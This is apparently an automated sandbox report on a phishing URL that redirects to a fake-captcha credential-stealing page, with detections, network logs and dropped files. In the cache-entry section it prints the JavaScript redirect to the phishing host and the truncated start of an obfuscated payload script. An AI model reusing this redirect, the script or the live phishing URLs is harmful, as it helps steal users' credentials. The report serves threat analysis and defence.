Edit tour

Windows Analysis Report
https://rickhome.com/secuure

Overview

General Information

Sample URL:	https://rickhome.com/secuure
Analysis ID:	1473242
Infos:

Detection

Fake Captcha, Phisher

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Yara detected Fake Captcha

Yara detected Phisher

Phishing site detected (based on shot match)

HTML page contains hidden javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3704 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5852 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rickhome.com/secuure" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_42	JoeSecurity_Phisher_2	Yara detected Phisher	Joe Security
dropped/chromecache_43	JoeSecurity_FakeCaptcha	Yara detected Fake Captcha	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.1.pages.csv	JoeSecurity_FakeCaptcha	Yara detected Fake Captcha	Joe Security
1.0.pages.csv	JoeSecurity_FakeCaptcha	Yara detected Fake Captcha	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound - Source IP: 139.28.37.144 - Destination IP: 192.168.2.6

Timestamp:	07/15/24-07:53:49.703358
SID:	2857090
Source Port:	443
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://rickhome.com/secuure	Avira URL Cloud: detection malicious, Label: phishing
Source: https://rickhome.com/secuure	SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

Antivirus detection for URL or domain

Source: https://rickhome.com/secuure/

Avira URL Cloud: Label: phishing

Phishing

Yara detected Fake Captcha

Source: Yara match	File source: 1.1.pages.csv, type: HTML
Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_43, type: DROPPED

Yara detected Phisher

Source: Yara match

File source: dropped/chromecache_42, type: DROPPED

Phishing site detected (based on shot match)

Source: https://logonline.emersiongis.com/?Mexovn=LR	Matcher: Template: captcha matched
Source: https://logonline.emersiongis.com/?Mexovn=LR	Matcher: Template: captcha matched

Source: https://logonline.emersiongis.com/?Mexovn=LR

HTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 120px; height: 40px; overflow: hidden; position: relative;"]

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49740 version: TLS 1.2

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2857090 ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound 139.28.37.144:443 -> 192.168.2.6:49723

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27

Source: global traffic	HTTP traffic detected: GET /secuure HTTP/1.1Host: rickhome.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /secuure/ HTTP/1.1Host: rickhome.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?Mexovn=LR HTTP/1.1Host: logonline.emersiongis.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rickhome.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: rickhome.com
Source: global traffic	DNS traffic detected: DNS query: logonline.emersiongis.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: chromecache_42.2.dr

String found in binary or memory: https://logonline.emersiongis.com/?Mexovn=LR

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49740 version: TLS 1.2

Source: classification engine

Classification label: mal84.phis.win@19/4@6/5

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rickhome.com/secuure"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5852 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5852 --field-trial-handle=2288,i,1816104043459986088,14968201683527968697,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://rickhome.com/secuure	0%	Virustotal		Browse
https://rickhome.com/secuure	100%	Avira URL Cloud	phishing
https://rickhome.com/secuure	100%	SlashNext	Credential Stealing type: Phishing & Social usering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://rickhome.com/secuure/	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
www.google.com	142.250.186.36	true	false	unknown
logonline.emersiongis.com	139.28.37.144	true	true	unknown
rickhome.com	5.172.176.24	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://rickhome.com/secuure	true		unknown
https://rickhome.com/secuure/	true	Avira URL Cloud: phishing	unknown
https://logonline.emersiongis.com/?Mexovn=LR	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
139.28.37.144	logonline.emersiongis.com	Ukraine	42331	FREEHOSTUA	true
5.172.176.24	rickhome.com	Russian Federation	20712	AS20712AndrewsArnoldLtdGB	false
142.250.186.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1473242
Start date and time:	2024-07-15 07:52:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://rickhome.com/secuure
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.phis.win@19/4@6/5
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.99, 142.250.186.174, 173.194.76.84, 34.104.35.123, 52.165.165.26, 192.229.221.95, 13.85.23.206, 93.184.221.240, 216.58.206.67, 199.232.214.172
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 42

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	110
Entropy (8bit):	4.739009973684304
Encrypted:	false
SSDEEP:	3:gnkAqRAdu6/GY7voOkADFoHD1JDy0PqME0NGYLn:7AqJm7+mmHZJm0oiL
MD5:	CC942C0F9BE1266EC327B6ACDD9C5B79
SHA1:	4C1FAD99950563A4BF6EABFF2D8CAC75A6DE72E3
SHA-256:	B0E34955D7991A690E30369FA7F411C4E79BA7E794CD6DF22A44BB0592008C0E
SHA-512:	3DD9518518EE4325212287EBF66E3BD1539E496892E646A3637A6FA1C386A8F2E81EC00A8508354862F3ABBE872FFEFE0BE7D63B666E10E9430862D1BFBD4249
Malicious:	false
Reputation:	low
URL:	https://rickhome.com/secuure/
Preview:	<script type="text/javascript">window.location.href = "https://logonline.emersiongis.com/?Mexovn=LR"</script>.

Chrome Cache Entry: 43

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (65455)
Category:	downloaded
Size (bytes):	217773
Entropy (8bit):	6.035940954883148
Encrypted:	false
SSDEEP:	3072:m7+/COE7DOMWdPI+EcI08Yugn7WWw9WMx+N6dHHw:PeOXdPI28YuQeWMXw
MD5:	0303AD023C8316AA684FA40981DC142A
SHA1:	13E4F549BA1EC6450A6741C60F037084FBD837E3
SHA-256:	0F4640DA0997C26D277E43A649545D001E650F6668EBE50ABE77E90AB2269705
SHA-512:	B2433F3D9D36829B464ABCEA842E7AE1AB3A6F6971882D4D9DFDE8F25DC3B316FF7A69CC410F581A2E03422458144FAE375A73822E518330C41CA21CFA161002
Malicious:	false
Reputation:	low
URL:	https://logonline.emersiongis.com/?Mexovn=LR
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <script type="text/javascript">. function a0E(T,d){var k=a0x();return a0E=function(a,x){a=a-0xef;var E=k[a];return E;},a0E(T,d);}(function(T,d){var kR=a0E,k=T();while(!![]){try{var a=parseInt(kR(0x3af))/0x1(-parseInt(kR(0x2a2))/0x2)+parseInt(kR(0x2e5))/0x3(parseInt(kR(0x3de))/0x4)+-parseInt(kR(0x282))/0x5+-parseInt(kR(0x189))/0x6(parseInt(kR(0x3ff))/0x7)+parseInt(kR(0x1ab))/0x8(parseInt(kR(0x16b))/0x9)+-parseInt(kR(0x485))/0xa+parseInt(kR(0x19c))/0xb;if(a===d)break;else k['push'](k['shift']());}catch(x){k['push'](k['shift']());}}}(a0x,0x2aae7),!(function(){var T=(function(){var c=!![];return function(p,r){var kj=a0E;if(kj(0x1ba)===kj(0x1ba)){var N=c?function(){var kP=kj;if(r){var Y=r[kP(0x256)](p,arguments);return r=null,Y;}}:function(){};return c=![],N;}else{var v=p[kj(0x4b8)];return'MacIntel'===v&&r()&&!N()?(function(){var kO=kj;if('iPad'===v['platform'])return!0x0;var Z=Z,C=Z[kO(0x3ef)]/Z[kO(0x471)];return M([kO(0x421)in g,!!b[kO(0x23

Static File Info

⊘No static file info

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/15/24-07:53:49.703358	TCP	2857090	ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound	443	49723	139.28.37.144	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 15, 2024 07:53:33.237803936 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.237936974 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.244306087 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.244323969 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.244683027 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.246134996 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.246223927 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.246229887 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.246330976 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.292503119 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.416661978 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.416754007 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:33.416956902 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.417207956 CEST	49709	443	192.168.2.6	40.115.3.253
Jul 15, 2024 07:53:33.417226076 CEST	443	49709	40.115.3.253	192.168.2.6
Jul 15, 2024 07:53:36.728198051 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 15, 2024 07:53:36.735971928 CEST	49673	443	192.168.2.6	173.222.162.64
